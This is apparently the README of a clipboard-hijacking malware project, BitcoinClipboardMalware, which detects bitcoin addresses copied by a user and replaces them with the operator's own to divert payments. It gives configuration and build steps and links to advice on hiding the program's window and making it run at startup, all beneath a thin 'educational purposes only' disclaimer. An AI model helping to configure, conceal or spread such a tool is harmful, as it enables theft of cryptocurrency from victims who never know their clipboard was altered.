BitcoinClipboardMalware is a program for detecting a bitcoin address in the clipboard and then replaced by your bitcoin address which written in the program.
This project was made for educational purposes only. The contributor(s) is/are NOT responsible of your acts with this program.
First, you have to configure the config.hpp file by creating an array containing bitcoin addresses. These bitcoin addresses will be used to replace the address detected in the clipboard. The array is already created, so you have to replace the already created array by yours.
If you have many addresses to add or that you don't want to make a mistake, use the tool "printBitcoinAddressesArr" (tools folder).
To manage the clipboard, the program use a specific API. Supported API for now:
windows
Unix:
Build on Windows:
./build.bat
Build on Unix-like Systems: To build, you have to specify a supported API in the parameter of build.sh
./build.sh $apiSupported # see above.
BitcoinClipboardMalware doesn't need to be visible, here's some useful links to hide the console window:
C++ (Windows): https://stackoverflow.com/questions/18260508/c-how-do-i-hide-a-console-window-on-startup
Unix: https://ubuntuforums.org/showthread.php?t=1451311
If you want that BitcoinClipboardMalware run on startup: C++ (Windows): https://stackoverflow.com/questions/15913202/add-application-to-startup-registry
Linux: https://stackoverflow.com/questions/13399891/how-to-make-a-program-run-at-startup
X11 support
Android